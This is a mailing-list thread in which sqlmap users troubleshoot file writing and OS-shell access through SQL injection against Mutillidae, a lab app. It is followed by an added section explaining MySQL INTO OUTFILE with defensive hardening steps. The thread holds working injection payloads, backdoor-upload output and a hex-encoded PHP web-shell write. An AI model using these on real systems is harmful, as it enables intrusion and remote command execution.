Re: [sqlmap-users] File Writing
From: Chris O. <chr...@gm...> - 2011-07-07 10:37:14
Hi Bernardo

I'm not sure what you mean when you say that the POST parameters are invalid. I tried the following:

C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/mutillidae/index.php?page=user-info.php" --data "username=foo&password=bar&user-info-php-submit-button=View+Account+details" -p "username" --os-shell

and the following occurs:

[11:31:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:31:47] [INFO] going to use a web backdoor for command prompt
[11:31:47] [INFO] fingerprinting the back-end DBMS operating system
[11:31:48] [INFO] the back-end DBMS operating system is Windows
[11:31:48] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
>
[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]: C:\wamp\www\mutillidae
[11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/mutillidae'
[11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/mutillidae/mutillidae'
[11:32:08] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 2 times
[11:32:08] [INFO] Fetched data logged to text files under 'C:\Program Files\sqlmap-0.9\output\localhost'

[*] shutting down at 11:32:08

Could it be to do with:

[11:31:49] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: C:\wamp\www\mutillidae
[11:32:01] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]: C:\wamp\www\mutillidae

Regards

Chris

On 6 July 2011 23:52, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Chris,
>
> No worries.
> If you want command execution, sqlmap can handle it automatically also
> when it's MySQL and you've got a writable folder within the document
> root, --os-cmd and --os-shell. Also, --os-pwn can work in this
> scenario too.
> The file stager uploaded is 0KB because you provide invalid values to
> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to
> upload the file stager against MySQL.
>
> See:
> --8<--
> $ python sqlmap.py -u
> "http://debian32/mutillidae/index.php?page=user-info.php" --data
> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1
> --os-shell --flush-session
>
> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> tool
> http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 23:49:52
>
> [23:49:52] [INFO] setting file for logging HTTP traffic
> [23:49:52] [INFO] using
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> as session file
> [23:49:52] [INFO] flushing session file
> [23:49:52] [INFO] testing connection to the target url
> [23:49:52] [INFO] heuristics detected web page charset 'ascii'
> [23:49:52] [INFO] testing if the url is stable, wait a few seconds
> [23:49:53] [INFO] url is stable
> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic
> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not
> dynamic
> [23:49:53] [INFO] heuristic test shows that POST parameter
> 'view_user_name' might be injectable (possible DBMS: MySQL)
> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name'
> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> HAVING clause'
> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND
> error-based - WHERE or HAVING clause' injectable
> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11
> AND time-based blind' injectable
> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns
> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> query (NULL) - 1 to 10 columns' injectable
> POST parameter 'view_user_name' is vulnerable. Do you want to keep
> testing the others? [y/N]
> sqlmap identified the following injection points with a total of 30
> HTTP(s) requests:
> ---
> Place: POST
> Parameter: view_user_name
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033)
> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 1 to 10 columns
> Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113)
> AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND
> 'TOwv'='TOwv&password=adminpass&Submit_button=Submit
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: view_user_name=admin' AND SLEEP(5) AND
> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit
> ---
>
> [23:51:31] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.2.6, Apache 2.2.9
> back-end DBMS: MySQL 5.0
> [23:51:31] [INFO] going to use a web backdoor for command prompt
> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system
> [23:51:31] [INFO] the back-end DBMS operating system is Linux
> [23:51:31] [INFO] trying to upload the file stager
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] PHP (default)
> [4] JSP
> >
> [23:51:32] [WARNING] unable to retrieve the web server document root
> please provide the web server document root [/var/www/]:
> [23:51:32] [WARNING] unable to retrieve any web server path
> please provide any additional web server full path to try to upload
> the agent [Enter for None]: /var/www/test
> [23:51:35] [WARNING] unable to upload the file stager on '/var/www'
> [23:51:35] [INFO] the file stager has been successfully uploaded on
> '/var/www/test' - http://debian32:80/test/tmpugbmo.php
> [23:51:35] [INFO] the backdoor has probably been successfully uploaded
> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php
> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
> os-shell> id
> do you want to retrieve the command standard output? [Y/n/a]
> command standard output: 'uid=33(www-data) gid=33(www-data)
> groups=33(www-data)'
>
> os-shell> pwd
> do you want to retrieve the command standard output? [Y/n/a]
> command standard output: '/var/www/test'
>
> os-shell> exit
> [23:51:44] [WARNING] HTTP error codes detected during testing:
> 404 (Not Found) - 1 times
> [23:51:44] [INFO] Fetched data logged to text files under
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32'
>
> [*] shutting down at 23:51:44
> --8<--
>
> Cheers,
> Bernardo
>
>
> On 6 July 2011 23:46, <chr...@gm...> wrote:
> > Hi
> >
> > Thanks. It turns out I was being an idiot. With absolute paths I didn't
> > realise that this also includes the destination file name. With that
> > included, it works like a dream.
> >
> > What I haven't managed to get going properly yet is the --os-cmd flag.
> > The temp stager file does appear, but is empty, 0KB. However, I think I'll
> > save that one for another day!
> >
> > Regards
> >
> > Chris
> > ------------------
> >
> > -----Original Message-----
> > From: "Bernardo Damele A. G." <ber...@gm...>
> > Date: Wed, 6 Jul 2011 23:42:22
> > To: Chris Oakley <chr...@gm...>
> > Cc: <sql...@li...>
> > Subject: Re: [sqlmap-users] File Writing
> >
> > Hi Chris,
> >
> > To me it works well:
> > --8<--
> > $ python sqlmap.py -u
> > "http://debian32/mutillidae/index.php?page=user-info.php" --forms -p
> > view_user_name --risk 3 --level 3 --parse-errors --file-write
> > /etc/passwd --file-dest /tmp/test --flush-session
> >
> > sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover
> > tool
> > http://sqlmap.sourceforge.net
> >
> > [!] legal disclaimer: usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility
> > to obey all applicable local, state and federal laws. Authors assume
> > no liability and are not responsible for any misuse or damage caused
> > by this program
> >
> > [*] starting at 23:26:35
> >
> > [23:26:35] [INFO] setting file for logging HTTP traffic
> > [23:26:35] [INFO] testing connection to the target url
> > [23:26:35] [INFO] heuristics detected web page charset 'ascii'
> > [23:26:35] [INFO] searching for forms
> > [#1] form:
> > POST http://debian32:80/mutillidae/index.php?page=user-info.php
> > POST data: view_user_name=&password=&Submit_button=Submit
> > do you want to test this form? [Y/n/q]
> >>
> > Edit POST data [default:
> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields
> > detected):
> > do you want to fill blank fields with random values? [Y/n]
> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you
> > provided is not inside the GET
> > [23:26:37] [INFO] using
> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session'
> > as session file
> > [23:26:37] [INFO] flushing session file
> > [23:26:37] [INFO] using
> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> > as results file
> > [23:26:37] [INFO] heuristics detected web page charset 'ascii'
> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds
> > [23:26:38] [INFO] url is stable
> > [23:26:38] [INFO] heuristic test shows that POST parameter
> > 'view_user_name' might be injectable (possible DBMS: MySQL)
> > [23:26:38] [INFO] testing sql injection on POST parameter
> > 'view_user_name'
> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> > clause'
> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> > clause'
> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
> > clause (Generic comment)'
> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based
> > blind - WHERE or HAVING clause (Generic comment)' injectable
> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
> > HAVING clause'
> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
> > HAVING clause'
> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
> > clause'
> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
> > clause'
> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR
> > error-based - WHERE or HAVING clause' injectable
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
> > query)'
> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> > [23:26:43] [INFO] target url appears to be UNION injectable with 4
> > columns
> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION
> > query (NULL) - 1 to 10 columns' injectable
> > [23:26:43] [WARNING] in OR boolean-based injections, please consider
> > usage of switch --drop-set-cookie if you experience any problems
> > during data retrieval
> > POST parameter 'view_user_name' is vulnerable. Do you want to keep
> > testing the others? [y/N]
> > sqlmap identified the following injection points with a total of 148
> > HTTP(s) requests:
> > ---
> > Place: POST
> > Parameter: view_user_name
> > Type: boolean-based blind
> > Title: OR boolean-based blind - WHERE or HAVING clause (Generic
> > comment)
> > Payload: view_user_name=-5244' OR NOT (1884=1884)--
> > &password=bDXj&Submit_button=Submit
> >
> > Type: error-based
> > Title: MySQL OR error-based - WHERE or HAVING clause
> > Payload: view_user_name=-3024' OR 1 GROUP BY
> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1
> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)--
> > &password=bDXj&Submit_button=Submit
> >
> > Type: UNION query
> > Title: MySQL UNION query (NULL) - 1 to 10 columns
> > Payload: view_user_name=IZBb' UNION ALL SELECT NULL,
> > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84)
> > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL,
> > NULL#&password=bDXj&Submit_button=Submit
> > ---
> >
> > do you want to exploit this SQL injection? [Y/n]
> > [23:26:46] [INFO] testing MySQL
> > [23:26:46] [INFO] confirming MySQL
> > [23:26:46] [INFO] the back-end DBMS is MySQL
> >
> > web application technology: PHP 5.2.6, Apache 2.2.9
> > back-end DBMS: MySQL >= 5.0.0
> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system
> > [23:26:46] [INFO] the back-end DBMS operating system is Linux
> > [23:26:46] [WARNING] if the problem persists with 'None' values please
> > try to use hidden switch --no-cast (fixing problems with some
> > collation issues)
> > do you want confirmation that the file '/tmp/test' has been
> > successfully written on the back-end DBMS file system? [Y/n]
> > [23:26:48] [INFO] the file has been successfully written and its size
> > is 1848 bytes, but the size differs from the local file '/etc/passwd'
> > (1845 bytes)
> > [23:26:48] [WARNING] expect junk characters inside the file as a
> > leftover from UNION query
> > [23:26:48] [INFO] you can find results of scanning in multiple targets
> > mode inside the CSV file
> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv'
> >
> > [*] shutting down at 23:26:48
> > --8<--
> >
> > Cheers,
> > Bernardo
> >
> >
> > On 3 July 2011 18:03, Chris Oakley <chr...@gm...> wrote:
> >> Hi
> >>
> >> I'm playing with file writing. I have a full privs root user set up in
> >> mysql and am using
> >> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
> >> to play with. I've set up a /temp folder below the web root of the app.
> >> I've put a file "evil.php" in the sqlmap working directory. I've also
> >> changed the permissions for all users on the temp folder to write access
> >> allowed.
> >>
> >> I'm using the following input to try and upload this file:
> >>
> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u
> >> "http://localhost/mutillidae/index.php?page=user-info.php" --data
> >> "username=&password=&user-info-php-submit-button=View+Account+Details"
> >> -p "username" --proxy "http://127.0.0.1:8085"
> >> --file-write "evil.php" --file-dest "temp/evil.php"
> >>
> >> This is with the latest dev build by the way.
> >>
> >> The output I get is:
> >>
> >> [18:00:03] [INFO] the back-end DBMS is MySQL
> >> web server operating system: Windows
> >> web application technology: PHP 5.3.5, Apache 2.2.17
> >> back-end DBMS: MySQL 5.0
> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system
> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows
> >> [18:00:04] [WARNING] if the problem persists with 'None' values please try
> >> to use hidden switch --no-cast (fixing problems with some collation issues)
> >> do you want confirmation that the file 'temp/evil.php' has been successfully
> >> written on the back-end DBMS file system? [Y/n]
> >> [18:00:12] [WARNING] it looks like the file has not been written, this can
> >> occur if the DBMS process' user has no write privileges in the destination
> >> path
> >> [18:00:12] [WARNING] expect junk characters inside the file as a leftover
> >> from UNION query
> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program
> >> Files\sqlmap-0.9\output\localhost'
> >>
> >> [*] shutting down at 18:00:12
> >>
> >> and sure enough the file isn't written. I've also tried using the --no-cast
> >> switch, to no avail.
> >>
> >> Does anyone have any ideas on what could be going wrong here? I can use the
> >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd and
> >> --os-pwn commands also fail at the stager upload phase, probably for similar
> >> reasons.
> >>
> >> Any help would be appreciated
> >>
> >> Cheers
> >>
> >> Chris
> >>
> >>
> >> ------------------------------------------------------------------------------
> >> All of the data generated in your IT infrastructure is seriously valuable.
> >> Why? It contains a definitive record of application performance, security
> >> threats, fraudulent activity, and more. Splunk takes this data and makes
> >> sense of it. IT sense. And common sense.
> >> http://p.sf.net/sfu/splunk-d2d-c2
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
> >
> >
> >
> > --
> > Bernardo Damele A. G.
> >
> > E-mail / Jabber: bernardo.damele (at) gmail.com
> > Mobile: +447788962949 (UK 07788962949)
> > PGP Key ID: Unavailable
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
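The thread turns on one MySQL primitive: a UNION injection whose last SELECT ends in INTO OUTFILE, which is how --file-write and the --os-shell stager upload land a file on the database host. The following is an added example, not code from the thread or from sqlmap, showing the statement the application ends up executing and the checks a defender runs to find and remove that capability. It assumes the 4-column UNION seen in the thread's payloads, a constructed table name accounts, a web-app DB account 'webapp'@'localhost', Apache's document root at /var/www, and a placeholder PHP stager; the paths and account name are assumptions, not values from the list posts.

```sql
-- Added example (not from the thread or from sqlmap): the MySQL side of the
-- file-write primitive the thread relies on, plus defender-side checks.
-- Assumptions: 4-column UNION injection into a user lookup (as in the thread),
-- table name 'accounts' (assumed), DB account 'webapp'@'localhost' (assumed),
-- web root /var/www (assumed). The hex literal is a constructed placeholder
-- stager, the bytes of: <?php system($_GET["c"]); ?>

-- 1. Attack side: what the injected 'view_user_name' value turns the query into.
--    INTO OUTFILE on the last SELECT of a UNION writes the whole result set to
--    the server host. Hex avoids quotes inside the payload. The legitimate row(s)
--    matched by the original WHERE clause are written too, which is the "junk
--    characters ... leftover from UNION query" the thread's output warns about
--    (and why the 1845-byte /etc/passwd came back as 1848 bytes).
SELECT * FROM accounts WHERE username = 'admin'
UNION ALL SELECT NULL, 0x3C3F7068702073797374656D28245F4745545B2263225D293B203F3E, NULL, NULL
  INTO OUTFILE '/var/www/test/stager.php';

-- Rules of INTO OUTFILE that explain the failures earlier in the thread:
--   * the file is created by the mysqld OS user, not by the DB account and not
--     by the web server user, so that user needs write access to the directory
--     (the "DBMS process' user has no write privileges" warning);
--   * the path must be absolute and include the file name; a relative name such
--     as temp/evil.php is resolved under the server's data directory, not the
--     web root;
--   * an existing file is never overwritten, so a second attempt at the same
--     name fails even when the directory is writable;
--   * the DB account needs the global FILE privilege (root has it).

-- 2. Defender side: find out whether this primitive is available at all.
--    secure_file_priv: '' means unrestricted, a directory confines writes to
--    it, NULL disables INTO OUTFILE / LOAD_FILE entirely.
SHOW VARIABLES LIKE 'secure_file_priv';

-- Which accounts hold FILE (the privilege INTO OUTFILE and LOAD_FILE need).
SELECT grantee
  FROM information_schema.user_privileges
 WHERE privilege_type = 'FILE';

-- 3. Hardening: the web application's account should never hold FILE, and the
--    server should confine file I/O to a directory outside the document root.
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
SHOW GRANTS FOR 'webapp'@'localhost';
-- In my.cnf (server restart required):
--   [mysqld]
--   secure_file_priv = /var/lib/mysql-files
```

With FILE revoked from the application account, the same UNION injection still reads data but the INTO OUTFILE step fails with an access-denied error, so --file-write, --os-cmd and --os-shell all stop at the upload phase; confining secure_file_priv to a directory outside the web root has the same effect even for accounts that keep FILE.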